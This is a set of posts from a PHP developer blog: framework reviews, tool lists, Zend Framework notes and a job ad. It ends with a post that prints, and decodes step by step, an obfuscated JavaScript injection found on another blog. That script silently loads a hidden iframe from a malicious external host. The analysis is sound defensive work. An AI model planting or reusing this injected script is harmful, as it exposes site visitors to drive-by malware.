Logaholic.de

This is a small review of Daniel ’smacks’ Harringtons beta php5 oop mvc framework “simples”. He sent me this comment yesterday:

Hi Karsten,

dein Beitrag ist zwar schon etwas her, steht aber bei Google zum Thema Micro-Framework ziemlich weit oben. Da ich gerade ebenfalls in der Situation war und etwas einfaches wie Sinatra für PHP gesucht und nichts ansprechendes gefunden habe, hab ich mich letztendlich hingesetzt und selber etwas zusammengestrickt.

Es hört auf den Namen “simples”, bietet Routing, MVC und ein bischen mehr, bietet aber z.B. keine Datenbank-Unterstützung an und kommt mit recht wenig Code aus. Da es bis jetzt noch keine Doku gibt, lohnt es sich auch mal im Code zu stöbern.

Feedback ist immer willkommen!
http://github.com/smacks/simples/tree/master

Ps. Das Ganze bitte noch als Beta betrachten. Für den produktiven Einsatz ist es bisher noch nicht gedacht.

He says that in his search for a lightweight php mvc framework, he didn’t find anything that satisfied his needs, and so he started to write his own. It is called “simples”, is still beta, has no comments, no documentation, no database support, but offers mvc, routing, “and some more”. It is not meant for production usage at the moment.

The first thing I noticed is that all of the configuration is done via constants. I don’t think a framework, which will be only one part of an application, should pollute global scope (even constants) too much, if at all. One improvement could be to add a prefix to the configuration (smacks_*), but I highly prefer a config class, which loads its content based on an environment (which itself could be set via ONE prefixed constant) via xml or php files. You can have different configurations for different purposes this way, and just have to switch the environment somewhere.

Another point considering ‘namespaces’ (in a general, not the php 5.3 namespaces way) is, that all “simples” framework classes also don’t have a prefix. You don’t want collisions there.

I also miss autoloading (do I always want to load anything? no.) and a response object.

All in all, the most important point is: Why should I want to use simples? I don’t see one point which is outstanding somehow… yet

Today i’d like to share my very own LAMP (Linux Apache Mysql PHP) development tool list for windows.

I don’t really care if it is Windows XP 32 or Vista 64, if the system supports all the hardware my workstation has (i.e. more than 4gb ram -> Vista 64).

Tier one tools (misc dev tools):

• Mozilla Firefox – browser
  • Firebug – developer plugin: “Firebug integrates with Firefox to put a wealth of web development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.”
    • Firephp – Firebug extension: “FirePHP enables you to log to your Firebug Console using a simple PHP method call. All data is sent via response headers and will not interfere with the content on your page. FirePHP is ideally suited for AJAX development where clean JSON and XML responses are required.”
    • Yslow – Firebug extension “performance”: “YSlow analyzes web pages and why they’re slow based on Yahoo!’s rules for high performance web sites.”
  • Selenium IDE – developer plugin “test automation”: “Selenium IDE is an integrated development environment for Selenium tests. It is implemented as a Firefox extension, and allows you to record, edit, and debug tests. Selenium IDE includes the entire Selenium Core, allowing you to easily and quickly…”
  • Firegestures – usability plugin: “A customizable mouse gestures extension which enables you to execute various commands and user scripts with five types of gestures.”
• Scite – lightweight, extremely fast text editor, including syntax highlighting, folding, tabbed interface
• Zend Studio/Eclipse (main IDE) – full featured IDE
  • PDT – PHP Development Tools
  • Mylyn – task & planning tools, issue/bug tracker integration
  • Subversive – subversion plugin
• PuTTY – ssh/telnet tool: “PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator.”
• WinSCP – sftp/scp tool: “WinSCP is an open source free SFTP client and FTP client for Windows. Legacy SCP protocol is also supported. Its main function is safe copying of files between a local and a remote computer.”
• Total Commander – file manager, ftp tool, two file windows
• WinRAR – archiver for rar/zip/tar/gz/…
• TrueCrypt – highly secure, portable data storage: “Free open-source disk encryption software for Windows Vista/XP, Mac OS X, and Linux”
• TortoiseSVN – subversion client: “A Subversion client, implemented as a windows shell extension.”
• VMware Workstation – virtual machines
  • LAMP vm
    • Xdebug – debug helpers: “The Xdebug extension helps you debugging your script by providing a lot of valuable debug information.”
    • phpMyAdmin – web-based database administration: “phpMyAdmin is a free software tool written in PHP intended to handle the administration of MySQL over the World Wide Web. phpMyAdmin supports a wide range of operations with MySQL. The most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, indexes, users, permissions, etc), while you still have the ability to directly execute any SQL statement.”

Tier two tools (specific dev tools):

• Opera/Safari/Chrome – different browsers for testing
• IrfanView – image viewer for lots of formats, (batch-)converter
• MySQL Workbench 5.0 – erd/db planning tool, reverse engineering for sql create scripts, some smart wizards, database visualisation
• BareTail – tail -f for windows (realtime logfile monitoring)
• WinCachegrind/CachegrindVisualizer/KCachegrind in VM – cachegrind visualisation, inspect profiler (xdebug) output
• CloudBerry S3 Explorer – very nice Amazon S3 managing tool

Tier three tools (communication/support):

• Microsoft Outlook (if Exchange is available) – emails, calendar
• Mozilla Thunderbird – emails, calendar
  • Enigmail – OpenPGP security
• UltraVNC – remote desktop, direct connection
• TeamViewer – remote desktop through firewalls, easy and fast setup – very good for helping “not so experienced” users
• Miranda IM – lightweight IM client (icq, aim, msn, jabber, …)
• mIRC – “the” IRC client
• Skype – voice chat

Tier four tools (music/media)

• Foobar2000 – lightweight audioplayer

Windows Settings:

• fixed taskbar with quicklaunch (icons have always the same order), visible time and no “hide unused icons” stuff

“I’m pleased to announce the Zend Framework 1.8.0 release, the first in our 1.8 series of releases. This release marks the culmination of several long-standing projects, as well as a formalization of many of our recommended practices. There are two major stories in this release: first, the addition of several components designed to provide and promote Rapid Application Development; second, two offerings that make using Zend Framework in the cloud easier.” [1]

Some thoughts, in no particular order:

If you know Amazon S3 (Amazon Simple Storage Soluation, a web-service for storing and receiving files, scalable, fast, safe) then you should have a look at Zend_Service_Amazon_S3. The Zend Framework not only offers a nice object oriented implementation, but also provides a PHP Stream Wrapper. Why is this so nice? Because one could add Amazon S3 support to existing applications by simply prefixing any standard file-operation with ’s3://’. This is the code sample from the documentation:

<?php
require_once 'Zend/Service/Amazon/S3.php';

$s3 = new Zend_Service_Amazon_S3($my_aws_key, $my_aws_secret_key);

$s3->registerStreamWrapper("s3");

mkdir("s3://my-own-bucket");
file_put_contents("s3://my-own-bucket/testdata", "mydata");

echo file_get_contents("s3://my-own-bucket/testdata");

Support for Amazon EC2 (Amazon Elastic Comput Cloud) has also been added (Zend_Service_Amazon_Ec2).

“Amazon EC2 provides a web service to allow launching and managing server instances within Amazon’s data centers. These server instances may be used at any time for any length of time — allowing you to scale your site only when you need to handle extra traffic, or run your services entirely from the EC2 platform.” [1]

Zend Framework jumped the train for “the” cli interface to the framework via Zend_Tool. One could create whole projects, models, controllers, views with it. This makes sense for starters imho. My full featured Zend Studio for Eclipse with customized code templates does this job way better for me. One thing i miss (Agavi has it! ^^) is a phpunit interface and some configuration which tests should be run. In my opinion, just the existance of such an option would encourage more users to think about/actually use unit tests.

Routing now supports translation aware routes, and route chaining capabilites. Those are fetures i know and love from Agavi.

There are loads of other new features (see [1]), which I haven’t checked yet – sometimes simply because they didn’t interest me.

I’m curious if switching our main project on monday to ZF 1.8.0 will break any test ^^.

Sources:
[1] Zend Developer Zone: Zend Framework 1.8.0 Released

Yesterday i found some code i wrote in 2002. I was bored in school, and was asking myself if it would be possible to let PHP play tetris, including some visualisation. There was no AJAX or any well-known JavaScript Framework  at that time (of which i had known), so after some “print a full game table for every move you do” sessions, i finally (ab)used outputbuffer-flushing and some DHTML (dom-manipulation through javascript).

The whole thing is only one ~25kb file and resembles a full tetris playing program

Since it was a fun project in my earlier stages, there are some things missing: “good code”, comments, coding standard (naming schemes), oop, … But it works.

The “AI”-part of the script is a “try and weight every possible move, choose the best” approach – one can tune the formula for this calculation for different results.

aiTris – PHP playing Tetris – Demo – just press the start button

I hereby release the source under the same license as i have chosen for this blog (creative commons share alike), so have fun!

Since logaholic.de was kind of inactive some weeks ago, my fellow co-blogger Pierre decided to go his own way with his own blog again. I’d like to thank you for all your effort for logaholic.de and wish you all the best. May the content be with you, my friend! And let there be pingbacks ^^

By the way, i’d like to point to Pierre’s own PHP Micro-framework entropy, which is in work again. I have seen some magic stuff in there so far, so let’s stay tuned for his release(s)

Mein Hauptarbeitgeber, die Karo Internet GmbH, sucht unter anderem für das Projekt Xchar neue Mitarbeiter.

Für folgende Stellen wird gesucht:

• Web-Entwickler: Frontend (m/w)
• Web-Entwickler: Backend (m/w)
• Web-Designer (m/w)
• Grafikdesigner (m/w)
• Systemadministrator: Windows/Linux (m/w)
• Community Manager (m/w)
• Praktikum: Web-Entwickler (m/w)
• Praktikum: Web-Designer (m/w)
• Praktikum: Community Support (m/w)

Quelle

Later this year, there will be a book on “Quality Assurance in PHP Projects” by Sebastian Bergmann (the author of PHPUnit) and Stefan Priebsch. Their own teaser:

“Stefan Priebsch and myself, Sebastian Bergmann, are writing a book on “Quality Assurance in PHP Projects”. The book will be published in English and German at the same time later this year.
The idea for the book is that Stefan Priebsch and I write the introductory as well as the concluding chapters while other authors contribute case studies for the middle part of the book.”

Source: Quality Assurance in PHP Projects – Introduction

As I just discovered, one case study in this book is about Agavi, contributed by David Zülke. There is also an abstract for this chapter: “Testing Agavi: Why Test Isolation Matters”.

I’m looking forward to this book: interesting topic(s), interesting case studies.

Every software development team should have an issue/bug-tracker (trac, jira, bugzilla, mantis, fogbugz, redmine, etc.) [1], and use source control (cvs, subversion, git, etc.) [2].

“I don’t care what you say. If you are developing code, even on a team of one, without an organized database listing all known bugs in the code, you are going to ship low quality code. Lots of programmers think they can hold the bug list in their heads. Nonsense. I can’t remember more than two or three bugs at a time, and the next morning, or in the rush of shipping, they are forgotten. You absolutely have to keep track of bugs formally.” [3]

The issue tracker allows you to create tasks with detailed descriptions and progress information, source control lets you add a commit message to give short information why you changed something and link it to the task.
Every good issue tracker will include tagged/linked commits to the related tasks.

If i have a ticket assigned, and commit a changeset to our repository, i will always tag it with the task id to establish a link (Check your source control connector for the syntax).
This allows not only followers of the timeline to instantly know why i did those changes, but they could also follow the link to the task and see any change related to it.
The other way around works equally: I can now check the ticket and see every related commit and its progress – even if it is not my task, i can get a feeling what the state is, what has been done, and who is working on it.
This adds transparency to my work and therefore the whole project.

My project manager now can see what i did when on which task. Using the functions of the particular issue tracker, he can see the progress of the subtask/task/milestone/project, who is doing what, and who has done what.

Leaving the commit message empty or not using the issue tracker makes your work a black box. You may have to explain, to many people, why or what for you did that commit. It will cost you (and your whole team) more time not to provide this information with the issue tracker/source control combination.

In short:

What to avoid:

- leave the commit message empty
- commit message not linked to a task
- not having created a task for your actual assignment

What to do:

+ Create a task for every task you are assigned to first
+ Link every commit through its message to the task (” * fix: caught HelloWorldException see ISSUE-1337″)
+ Always create tasks for everything (issues/bugs) you find (be sure to not duplicate issues, so use the search function first)

What you get for it:

+ You are saving your own and your team’s time
+ Transparency for yourself and the project manager(s)
+ Improved collaboration
+ Automatic documentation: what happened when to our code and why

Related links:
[1] Wikipedia: Comparison of issue tracking systems
[2] Wikipedia: Comparison of revision control software
[3] Joel Spolsky – Joel on Software – The Joel Test: 12 Steps to better Software

Agavi and Zend Framework are two major MVC PHP5 Frameworks today. I am actively using both in two different projects.

I will discuss some differences, starting with Part 1 now: Forms.

Forms are used in nearly any web application where you expect user-input. Following the “never trust your users” rule, proper validation is one major (security-) subtopic of forms.

1. Building simple Forms:

Zend Framework:

a) define your Zend_Form object, once, including validation

    /**
     * @return Zend_Form
     */
    protected function getDemoForm()
    {
        $form = new Zend_Form();

        $form->addElement('textarea', 'comment', array(
            'label' => 'comment:',
            'required' => true,
            'validators' => array(
                array('StringLength', array(160), array(1))
            )
        ));
        $form->addElement('submit', 'submit', array(
            'label' => 'submit',
        ));

        return $form;
    }

b) trigger validation in your action, use the result if validation succeeds

$demoForm = $this->getDemoForm();
$request = $this->getRequest();

if ($request->isPost())
{
    if ($demoForm>isValid($request->getPost()))
    {
        doSomeStuff();
        redirectToSuccessAction();
    }
}

c) pass the form object to your view

$this->view->demoForm = $demoForm;

Agavi:

a) write html code for your form in your view

You know how that works. (Or see the Agavi documentation link below)

b) add validation to your write-action

The Agavi documentation prefers defining validators in a .xml file, per action, app/modules/Posts/validate/Add.xml:  (module Post, Action Add)

<?xml version="1.0" encoding="UTF-8"?>
<ae:configurations
  xmlns="http://agavi.org/agavi/config/parts/validators/1.0"
  xmlns:ae="http://agavi.org/agavi/config/global/envelope/1.0"
  parent="%core.module_dir%/Posts/config/validators.xml"
>
  <ae:configuration>

    <validators>
      <validator class="string">
        <arguments>
          <argument>title</argument>
        </arguments>
        <errors>
          <error>The title field has an invalid value.</error>
          <error for="required">Please provide a title.</error>
          <error for="max_error">The title must be shorter than 255 characters.</error>
        </errors>
        <ae:parameters>
          <ae:parameter name="max">255</ae:parameter>
        </ae:parameters>
      </validator>
    </validators>
  </ae:configuration>
</ae:configurations>

c) formpopulationfilter magic

“All we need to do is re-display our form on the error page and the AgaviFormPopulationFilter will perform all of those duties. To re-display the form we could either include it in the ErrorViews template or we could set the input template in the view.”

2. The Zend Framework way

+ Encapsulation

+ Abstraction

+ DRY

3. The Agavi way

- I have to keep an eye to input names, as they are needed at more than one place. Beware of templating guys changing the input names, breaking stuff.

- validating an action, not a single form/form object

- breaks the DRY principle, code duplication occurs

4. Conclusion

I prefer Zend Framework over Agavi for forms. The main reason is the encapsulation in ZF with the Zend_Form object.

I can have more separated forms with separate validation on one page. I can reuse forms withouth having (that much) duplicate code anywhere. I don’t have to make changes to multiple locations if changing input names or validation, just one object holds every needed information/configuration. Zend_Form also does the html output for me, application-persistent interface guaranteed (styling is done via css or decorators per form/element).

Sources:

• Zend Framework Documentation: Zend_Form
• Agavi Documentation: Form Processing

Today a friend of mine sent me a link to a blog, at which my virus-scanner went havoc. HTML/Crypt.Gen Stuff, Trojan warning, etc.
After getting the scanner to really let me see the source (…), i found this:

<script language="JavaScript" type="text/javascript">
B46F5DF="pars";B46F5DF+="eInt";D8FA33DFE494F="Stri";D8FA33DFE494F+="ng";D8FA33DFE494F+=".fr";D8FA33DFE494F+="om";D8FA33DFE494F+="CharCode";function A2E39329F3265(B5A87C40BB26CEA){var E46F3EB4=525;E46F3EB4=E46F3EB4-509;BD0AB=eval(B46F5DF+"(B5A87C40BB26CEA,E46F3EB4)");return(BD0AB);}function AFE763E61CEF(C4D8544E71077){var C58BCCF5D58E99C=982;C58BCCF5D58E99C=C58BCCF5D58E99C-980;var A04698CEC="";for(B3CA4BA50C=0;B3CA4BA50C<C4D8544E71077.length;B3CA4BA50C+=C58BCCF5D58E99C){A04698CEC+=( eval(D8FA33DFE494F+"(A2E39329F3265(C4D8544E71077.substr(B3CA4BA50C,C58BCCF5D58E99C)))"));}eval(A04698CEC);}AFE763E61CEF("69662028646F63756D656E742E636F6F6B69652E736561726368282272746E78773D372229203D3D202D3129207B0A726A7061743D646F63756D656E742E676574456C656D656E744279496428277174697427293B696628726A7061743D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D71746974207372633D687474703A2F2F6773746174732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D202272746E78773D373B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");
</script>

I now was eager to find out what this does, so i started to de-obfuscate this by hand:

1. Adding linebreaks:

B46F5DF="pars";
B46F5DF+="eInt";
D8FA33DFE494F="Stri";
D8FA33DFE494F+="ng";
D8FA33DFE494F+=".fr";
D8FA33DFE494F+="om";
D8FA33DFE494F+="CharCode";
function A2E39329F3265(B5A87C40BB26CEA){
    var E46F3EB4=525;
    E46F3EB4=E46F3EB4-509;
    BD0AB=eval(B46F5DF+"(B5A87C40BB26CEA,E46F3EB4)");
    return(BD0AB);
}

function AFE763E61CEF(C4D8544E71077){
    var C58BCCF5D58E99C=982;
    C58BCCF5D58E99C=C58BCCF5D58E99C-980;
    var A04698CEC="";
    for(B3CA4BA50C=0;B3CA4BA50C<C4D8544E71077.length;B3CA4BA50C+=C58BCCF5D58E99C){
        A04698CEC+=( eval(D8FA33DFE494F+"(A2E39329F3265(C4D8544E71077.substr(B3CA4BA50C,C58BCCF5D58E99C)))"));
    }
    eval(A04698CEC);
}

AFE763E61CEF("69662028646F63756D656E742E636F6F6B69652E736561726368282272746E78773D372229203D3D202D3129207B0A726A7061743D646F63756D656E742E676574456C656D656E744279496428277174697427293B696628726A7061743D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D71746974207372633D687474703A2F2F6773746174732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D202272746E78773D373B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");

2. Renaming the stuff, removing obfuscation:

function hex2dec(param1){
    BD0AB=parseInt(param1,16);
    return(BD0AB);
}

function decodeAndEval(param1){
    var buffer="";
    for(i=0;i<param1.length;i+=2){
        buffer+=( String.fromCharCode(hex2dec(param1.substr(i,2))) );
    }
    eval(buffer);
}

decodeAndEval("69662028646F63756D656E742E636F6F6B69652E736561726368282272746E78773D372229203D3D202D3129207B0A726A7061743D646F63756D656E742E676574456C656D656E744279496428277174697427293B696628726A7061743D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D71746974207372633D687474703A2F2F6773746174732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D202272746E78773D373B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");

3. Echoing the decoded string:

if (document.cookie.search("rtnxw=7") == -1) {
rjpat=document.getElementById('qtit');if(rjpat==null){document.write('<iframe id=qtit src=http://gstats.cn style=display:none></iframe>');}
document.cookie = "rtnxw=7;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}

So this small JavaScript opens an Iframe to some chinese website, which is right now marked as offensive in my firefox. I like small riddles in the morning